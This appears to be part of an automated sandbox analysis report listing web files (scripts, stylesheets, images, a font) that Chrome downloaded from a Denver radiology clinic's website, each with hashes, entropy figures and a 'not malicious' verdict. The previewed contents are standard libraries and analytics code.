                                                                                                                                                                                                                                        URL:https://www.youtube.com/s/player/8a8ac953/player_ias.vflset/en_US/remote.js
                                                                                                                                                                                                                                        Preview:(function(g){var window=this;'use strict';var Km=function(K){g.$H(K,"zx",Math.floor(Math.random()*2147483648).toString(36)+Math.abs(Math.floor(Math.random()*2147483648)^g.Ef()).toString(36));return K},G7=function(K,G,E){Array.isArray(E)||(E=[String(E)]);.g.eQE(K.U,G,E)},hsf=function(K){if(K instanceof g.Dg)return K;.if(typeof K.f7=="function")return K.f7(!1);if(g.YY(K)){var G=0,E=new g.Dg;E.next=function(){for(;;){if(G>=K.length)return g.Rd;if(G in K)return g.R8(K[G++]);G++}};.return E}throw Error("Not implemented");},HVJ=function(K,G,E){if(g.YY(K))g.ap(K,G,E);.else for(K=hsf(K);;){var L=K.next();if(L.done)break;G.call(E,L.value,void 0,K)}},$VR=function(K,G){var E=[];.HVJ(G,function(L){try{var O=g.nr.prototype.C.call(this,L,!0)}catch(y){if(y=="Storage: Invalid value was encountered")return;throw y;}O===void 0?E.push(L):g.QN7(O)&&E.push(L)},K);.return E},dV6=function(K,G){$VR(K,G).forEach(function(E){g.nr.prototype.remove.call(this,E)},K)},iVU=function(K){if(K.Wq){if(K.Wq.locationOverri
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1846)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):74191
                                                                                                                                                                                                                                        Entropy (8bit):5.106181231853461
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:46D7B0EF7AA04F3528B3C226C70051C5
                                                                                                                                                                                                                                        SHA1:EC4F900DA4D0A3338BCF3B8E0C99EB8BBB7022CF
                                                                                                                                                                                                                                        SHA-256:6A1B722C55139DF30D44681D851093AB118271FFD0872988A8221178F1E3AAB1
                                                                                                                                                                                                                                        SHA-512:7B9CAC457A72F2787C8D8C4CC6E1A2872D793F7FE6B6AAD0CC8AF4F86FE237E337C22AC85040D006C94B02DB94C870AB38DFF68374E3EF5F327A637FFD33D186
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_45d0d23ed0cb5c8dceb54a1359eec7b6.js
                                                                                                                                                                                                                                        Preview:/*!. * Flickity PACKAGED v2.2.1. * Touch, responsive, flickable carousels. *. * Licensed GPLv3 for open source use. * or Flickity Commercial License for commercial use. *. * https://flickity.metafizzy.co. * Copyright 2015-2019 Metafizzy. */.(function(window,factory){if(typeof define=='function'&&define.amd){define('jquery-bridget/jquery-bridget',['jquery'],function(jQuery){return factory(window,jQuery);});}else if(typeof module=='object'&&module.exports){module.exports=factory(window,require('jquery'));}else{window.jQueryBridget=factory(window,window.jQuery);}}(window,function factory(window,jQuery){'use strict';var arraySlice=Array.prototype.slice;var console=window.console;var logError=typeof console=='undefined'?function(){}:function(message){console.error(message);};function jQueryBridget(namespace,PluginClass,$){$=$||jQuery||window.jQuery;if(!$){return;}.if(!PluginClass.prototype.option){PluginClass.prototype.option=function(opts){if(!$.isPlainObject(opts)){return;}.this.options=$
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1700)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):49264
                                                                                                                                                                                                                                        Entropy (8bit):5.317167710583167
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:CE340478ADF46007325D32FC1C982820
                                                                                                                                                                                                                                        SHA1:546D1599E234D8CD8B375C971E263459CAD37467
                                                                                                                                                                                                                                        SHA-256:978C0005866B49F1CD5971CFABE015F3750D6C5A6C7CA43C54E7E57BA4429DBA
                                                                                                                                                                                                                                        SHA-512:A44000FE093ACEC6B6FC20641D7CDEEFA24DEE9DBD6EBCC42FF7F193F27305DB8B6190D02729CD3A5A741C1C4698FA16338155C887A6F4F600C4CE98C492143C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://www.gstatic.com/eureka/clank/134/cast_sender.js
                                                                                                                                                                                                                                        Preview:(function(){'use strict';var f,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},g=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ba=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},ca=ba(this),da=function(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&g(c,a,{configurable:!0,writable:!0,value:b})}};.da("Symbol",function(a){if(a)return a;var b=function(h,k){this.g=h;g(this,"description",{configurable:!0,writable:!0,value:k})};b.prototype.toString=function(){return this.g};var c="jscomp_symbol_"+(Math.random()*1E9>>>0)+"_",d=0,
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=1, orientation=upper-left], progressive, precision 8, 342x228, components 3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16858
                                                                                                                                                                                                                                        Entropy (8bit):7.969496737116936
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:4B118AE6560658C2F43E8A51D3336245
                                                                                                                                                                                                                                        SHA1:53AB6BBD9AEDC41127AF22E3101DDD25F365DCFE
                                                                                                                                                                                                                                        SHA-256:4016E069688F0F32AA4BC7FC8C7A7A15A636EF55539344BD7749E0443AD065F4
                                                                                                                                                                                                                                        SHA-512:2DB347EB29B52DF8CDF6A99F84B1C614DF591220AF08DE99F3070B33405C9B3B0FC74508BF71C45EB6197B55BEB57EFEB4BA593C9D05F906F65E444610740C86
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:....."Exif..II*....................................................................!........'.."#%%%..),($+!$%$...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$........V.............5...................................................................Y.Qt.....<.....}...^,...-B.................L. .c.HgQ)u..S.e.=.w...:w..._.Nw...+.{.\.-+.5....a4.`..zE.I.X..7.....f..V....J.,r3X..?5}.......p.>.GL.e...U..|.=...pt.s.....]...*.z.1f.*...'K8..D...:>......[x^..o..S.m.o...uQ.=.._U..~..}..eMb......T..$..9.....-Nn..gxm...]..T.=..^.*.../S...........("d.......K.{w...fl.....R.<.^.....m.8..b]..}...8.....~..u.{.....p/....<....J..^..zO..........%}M.p...?....3....,v.?E....~{..8f..atN...|.rt...~.i...&..........\.._E.x...N.h.z.Mg6Ff...R.9(.%.X.Q.,u...>...~.Q.2.Rsj...F.....=......E.9.zt.....q)y..)..9.c._...:X....\..s.y:.E..W&..[.....|....c..'.~...K9.e|/e........m..z.wM.r........E..&....r?K..}.....5..OBa.+.4..iy:XM..`.#C..Iz#...%..M...?.~..-..4..g......6#..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=3, software=Picasa], baseline, precision 8, 68x68, components 3
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):3258
                                                                                                                                                                                                                                        Entropy (8bit):7.6668734561667105
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:A29A68DBBA48136686531DBCE7CC58A2
                                                                                                                                                                                                                                        SHA1:EFFA626CB6C751660F303D417210A6275F46081F
                                                                                                                                                                                                                                        SHA-256:9198F5EF3CECE3E2B79E8684139F8A61B312BED24321A9AF66891DE494798576
                                                                                                                                                                                                                                        SHA-512:2C71ED7087FF3CDD24DBF9A5374EC3CBBE0F28C1B802370456E58A1A44D4B0C320CC5F1A488F0465A7709B2A40688F82276C27A8E76F53E045B994FA25E1573B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://yt3.ggpht.com/ytc/AIdro_kcSUx4AUb3Ynub5dgqznmhyOtqJl0y0l5_u7tdNuUO=s68-c-k-c0x00ffffff-no-rj
                                                                                                                                                                                                                                        Preview:......JFIF..............Exif..II*.......1.......2...;.......9...i.......J.......Picasa.Katherine Kirby............0220........h.......2021:01:27 11:59:49....uhttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.5.0"> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" exif:DateTimeOriginal="2021-01-27T11:59:49+00:00" photoshop:DateCreated="2021-01-27T11:59:49+00:00"> <dc:creator> <rdf:Seq> <rdf:li>Katherine Kirby</rdf:li> </rdf:Seq> </dc:creator> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="w"?>............................................................................................................................................D.D.........................................4............................!.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5436)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):319292
                                                                                                                                                                                                                                        Entropy (8bit):5.592839691952798
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:5F82ABF1F81384FC513D380EBCB076B9
                                                                                                                                                                                                                                        SHA1:C7170E4CFD0FAF13F1B990FE2C42758EE29F176A
                                                                                                                                                                                                                                        SHA-256:F28E879A08444271EDA0813B810346AD2FB7D8F0ED36D8702C4CBDFAA0937BCB
                                                                                                                                                                                                                                        SHA-512:79D4D66AAD9D7B49956F9BE094BA21935E14DE5723098A1B3C67687FD6E8A7052CAA47B54C9B03A155731A49D5E9E36822836F474BF00AC4A246114430557D9A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtag/js?id=AW-11060750287
                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":16,"vtp_instanceDestinationId":"AW-11060750287","tag_id":10},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_re
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4932)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):305100
                                                                                                                                                                                                                                        Entropy (8bit):5.584409343861334
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:E1BDD36C7FE3573D71F3270C5EFD2C58
                                                                                                                                                                                                                                        SHA1:C4F108872BBB210382CF9F1943BAB0E14A58574F
                                                                                                                                                                                                                                        SHA-256:36F5EF8442987DC15C7E576678B6137FBC6AA1557FBF4C94EE0B0EF30DCCFC4C
                                                                                                                                                                                                                                        SHA-512:D54258646330012B9CAEDF17474B78481A1EDC797AF6AE1312FB1E9389DE2C5DF94272EA39AEC955CE1B9A99F3AE888C91F2C86A774E0B6EE9E6C87161536D4B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtm.js?id=GTM-KK8KT7F
                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"3",. . "macros":[{"function":"__e"},{"function":"__v","vtp_name":"gtm.elementUrl","vtp_dataLayerVersion":1},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"function":"__e"},{"function":"__v","vtp_name":"gtm.element","vtp_dataLayerVersion":1},{"function":"__v","vtp_name":"gtm.elementClasses","vtp_dataLayerVersion":1},{"function":"__v","vtp
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):32
                                                                                                                                                                                                                                        Entropy (8bit):4.351409765557392
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:282D5D259F93F779E66DBEF034ACAF5E
                                                                                                                                                                                                                                        SHA1:E4545F5274FB88C73CC1B0FE9A71F7E0E77EA585
                                                                                                                                                                                                                                        SHA-256:F8BCD9E592F05C9CBE76E4264B019613B296257E7C8F9502F76E9DEC8B79DDEE
                                                                                                                                                                                                                                        SHA-512:618B434C00D532020BD73DF06203C83D27398DF495FC8542FCC85F41312363678FED2A17A52011FD55A4858AD22F60438BBB11ED29826856411BDDE6DF19D058
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCTAhAp5evHnFEgUNEzQKziH6r_nujO1f3xIZCS4oEZDesvWxEgUNEzQKziH6r_nujO1f3w==?alt=proto
                                                                                                                                                                                                                                        Preview:CgkKBw0TNArOGgAKCQoHDRM0Cs4aAA==
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4706), with CRLF, LF line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):4740
                                                                                                                                                                                                                                        Entropy (8bit):4.935877186546147
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:28C8CC72521E66E782B4A78E4C73A561
                                                                                                                                                                                                                                        SHA1:9AB27A5D9EAC8746A4B249FD97F817DFC5F7250B
                                                                                                                                                                                                                                        SHA-256:AABEE302617BAB693BA55064784E0D4BEB8B64C0543CC7994BEE0716A3BDD4A5
                                                                                                                                                                                                                                        SHA-512:293E2601D0AD86F050F1CF04BEC56A31D1494DB01D566D0DDD4E7D7DF29677232A315EFD061503081B573E80AF97552BDE3CD18D187BC81FB179EF0367371F67
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_af9c7a15ed7204fbb889e056764bc429.css
                                                                                                                                                                                                                                        Preview:/*!.. * Practis Popups 1.1.0.. */..popup_background,.popup_wrapper{overflow:hidden !important}.popup_wrapper{padding:10px}.practis_popup_inner{padding:20px}.practis_popup_inner *:first-child{margin-top:0}.practis_popup_inner *:last-child{margin-bottom:0}.practis_popup{display:none;position:relative;max-height:100%;overflow:auto;background-color:#fff;background-clip:border-box;background-image:none;background-position:center center;background-repeat:no-repeat;background-size:cover;border:1px solid rgba(0,0,0,.125);box-shadow:none;color:#212529}.practis_popup h1,.practis_popup h2,.practis_popup h3,.practis_popup h4,.practis_popup h5,.practis_popup h6,.practis_popup .h1,.practis_popup .h2,.practis_popup .h3,.practis_popup .h4,.practis_popup .h5,.practis_popup .h6{color:#212529}.practis_popup a,.practis_popup a:hover{color:#00e}.practis_popup img,.practis_popup canvas,.practis_popup iframe,.practis_popup video,.practis_popup svg{max-width:100%}.practis_popup img{height:auto}.practis_popup
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=4], baseline, precision 8, 1536x619, components 3
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):115644
                                                                                                                                                                                                                                        Entropy (8bit):7.865217887314242
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:0EA20746244F5A80C73CCB5742647217
                                                                                                                                                                                                                                        SHA1:C005F740114C811CD7E38AA43387158DB93C92E7
                                                                                                                                                                                                                                        SHA-256:E4109646561C7D2936F8D60E454AD26751449E6A9325E73BF4B174B6B884F0E1
                                                                                                                                                                                                                                        SHA-512:E85FDC006E39152E7FE22CE280BB71733C1399AED20550F8062FF59877764F961F847A290BFCA72538FE40AA7D97854F973645B14C56F4AE4A38962AD71A02B5
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/uploads/2021/02/new-obl-pic-1536x619.jpg
                                                                                                                                                                                                                                        Preview:......JFIF.....`.`......Exif..MM.*.......;.........J.i.........Z....... ...............>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 77160, version 4.459
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):77160
                                                                                                                                                                                                                                        Entropy (8bit):7.996509451516447
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:AF7AE505A9EED503F8B8E6982036873E
                                                                                                                                                                                                                                        SHA1:D6F48CBA7D076FB6F2FD6BA993A75B9DC1ECBF0C
                                                                                                                                                                                                                                        SHA-256:2ADEFCBC041E7D18FCF2D417879DC5A09997AA64D675B7A3C4B6CE33DA13F3FE
                                                                                                                                                                                                                                        SHA-512:838FEFDBC14901F41EDF995A78FDAC55764CD4912CCB734B8BEA4909194582904D8F2AFDF2B6C428667912CE4D65681A1044D045D1BC6DE2B14113F0315FC892
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/themes/milo/fonts/fontawesome-webfont.woff2?v=4.7.0
                                                                                                                                                                                                                                        Preview:wOF2......-h..........-.........................?FFTM.. .`..r.....(..X.6.$..p..... .....u[R.rGa...*...'.=.:..&..=r.*.......].t..E.n.......1F...@....|....f.m.`.$..@d[BQ.$([U<+(..@P.5..`....>.P..;.(..1..l..h...)..Yy..Ji......|%..^..G..3..n........D..p\Yr .L.P.....t.)......6R.^"S.L~.YR.CXR...4...F.y\[..7n..|.s.q..M..%K......,.....L.t.'....M.,..c..+b....O.s.^.$...z...m...h&gb...v.....'..6.:....s.m.b.1.m0"....*V.....c.$,0ATPT.1.....<..;...`..'.H.?.s.:..ND.....I..$..T..[..b4........,....bl6...IL.i}.&.4.m,'....#....Rw..bu..,K......v....m_-...\H....HH.......?...m..9P...)9.J..$.....8......~.;.r..n.=$.....Nddn.!'....;...8..'.N...!.-..J.........X.=.,......"`:....... {......K!'...-FH....#$~.Z_.......N5VU8F....%.P..........Cp..$.Q.......r.....k.k...3...:R.%....2{.....h%.)8..........ILK.6v.#......,;.6..N.2.hv...........OO..t#....xT..Bf....q^.#....?{.5b.I..%-WZ..b.A...^.1..n5.....NQ.Y'.........S.....!t" .`b3..%....35....fv;....l..9.:jgf?gr..p.x. ..|.. $. e.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3054)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):138306
                                                                                                                                                                                                                                        Entropy (8bit):5.408944980823471
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:E70BD10CEA8C37F2B3DA2EE048381AD3
                                                                                                                                                                                                                                        SHA1:F5A3C4F0152D6DBA43C0E719DA16768ABCFD4661
                                                                                                                                                                                                                                        SHA-256:4DF7A5E83292F707BE1676A327905785B9516D24D62F32544B707C5ED5DE0394
                                                                                                                                                                                                                                        SHA-512:2BE0D289D55BC6E2331C2429C0C0D239391549CB0AD0CB66EB3164474E18D02C6045A380AB6630DD67812056D46C4F3539C6C620E797D40E0606E68A08BF9849
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_d38ecc48a4303501a23f4b3518c189ce.js
                                                                                                                                                                                                                                        Preview:/*!. * Bootstrap v4.6.1 (https://getbootstrap.com/). * Copyright 2011-2021 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.(function(global,factory){typeof exports==='object'&&typeof module!=='undefined'?factory(exports,require('jquery')):typeof define==='function'&&define.amd?define(['exports','jquery'],factory):(global=typeof globalThis!=='undefined'?globalThis:global||self,factory(global.bootstrap={},global.jQuery));})(this,(function(exports,$){'use strict';function _interopDefaultLegacy(e){return e&&typeof e==='object'&&'default'in e?e:{'default':e};}.var $__default=_interopDefaultLegacy($);function _defineProperties(target,props){for(var i=0;i<props.length;i++){var descriptor=props[i];descriptor.enumerable=descriptor.enumerable||false;descriptor.configurable=true;if("value"in descriptor)descriptor.writable=true;Object.defineProperty(target,descriptor.key,descriptor);}}
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                        Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                                                        SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                                                        SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                                                        SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://td.doubleclick.net/td/rul/11060750287?random=1743111905938&cv=11&fst=1743111905938&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be53q1za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=102482433~102522474~102788824~102803279~102813109~102887800~102926062&u_w=1280&u_h=1024&url=https%3A%2F%2Fmipscenter.com%2F&hn=www.googleadservices.com&frm=0&tiba=Interventional%20Radiology%20in%20Denver%2C%20CO%20%7C%20MIPS%20Center&npa=0&pscdl=noapi&auid=1553177151.1743111906&fledge=1&data=event%3Dgtag.config
                                                                                                                                                                                                                                        Preview:<html></html>
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2490), with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):2490
                                                                                                                                                                                                                                        Entropy (8bit):4.896970071868004
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:BC542AE8B38FAE5A423027D3731B6F11
                                                                                                                                                                                                                                        SHA1:D93802D0091F461B1DDBF5B248CEB46D4814FA0D
                                                                                                                                                                                                                                        SHA-256:B11D9C71142861D859A32E9D19A6D4858922781DB438C62116BCEAA7405B6451
                                                                                                                                                                                                                                        SHA-512:1E0E49CB9ED49C8E1180454488B7286989D673D7EB2C3180A807BFA686EF23B0AAE5FB0448C11DB1C0386D251BA73A9BE02717CC5FE9616598B88FA603F1EE9F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/css/autoptimize_single_bd8588e4b0c0a35837f09d5678d2471c.css
                                                                                                                                                                                                                                        Preview:.site-main .comment-navigation,.site-main .posts-navigation,.site-main .post-navigation{margin:0 0 1.5em;overflow:hidden}.comment-navigation .nav-previous,.posts-navigation .nav-previous,.post-navigation .nav-previous{float:left;width:50%}.comment-navigation .nav-next,.posts-navigation .nav-next,.post-navigation .nav-next{float:right;text-align:right;width:50%}.screen-reader-text{border:0;clip:rect(1px,1px,1px,1px);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-wrap:normal !important}.screen-reader-text:focus{background-color:#eee;clip:auto !important;clip-path:none;color:#444;display:block;font-size:1em;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}.alignleft{display:inline;float:left;margin-right:1.5em}.alignright{display:inline;float:right;margin-left:1.5em}.aligncenter{clear:both;display:block;margin-left:auto;margin-right:auto}.clear:before,.clear:after,.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (981)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):6686
                                                                                                                                                                                                                                        Entropy (8bit):5.0589362898981545
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:9FDFA9DF8031C9D3C6E447C2F203615E
                                                                                                                                                                                                                                        SHA1:44D96CB952E254B1C3F38D10D7C4FF4D3CE957AE
                                                                                                                                                                                                                                        SHA-256:38006CD5B27825ABBE2F5912AB22CDDD1830346D0D4BEE81AC7BE0F68D997FFA
                                                                                                                                                                                                                                        SHA-512:F8CED270327FE1D96E4B870289FB58CA1E9FA0D859A96909060CC7D651B2EE6F16C6896B4868FEBFE71A00B7843072E3B1645917E9C4011EA380CE02A0580383
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_7bef6ce7a551419eda56949734c4e27c.js
                                                                                                                                                                                                                                        Preview:(function webpackUniversalModuleDefinition(root,factory){if(typeof exports==='object'&&typeof module==='object').module.exports=factory();else if(typeof define==='function'&&define.amd).define("whatInput",[],factory);else if(typeof exports==='object').exports["whatInput"]=factory();else.root["whatInput"]=factory();})(this,function(){return(function(modules){var installedModules={};function __webpack_require__(moduleId){if(installedModules[moduleId]).return installedModules[moduleId].exports;var module=installedModules[moduleId]={exports:{},id:moduleId,loaded:false};modules[moduleId].call(module.exports,module,module.exports,__webpack_require__);module.loaded=true;return module.exports;}.__webpack_require__.m=modules;__webpack_require__.c=installedModules;__webpack_require__.p="";return __webpack_require__(0);}).([(function(module,exports){'use strict';module.exports=function(){if(typeof document==='undefined'||typeof window==='undefined'){return{ask:function ask(){return'initial';},ele
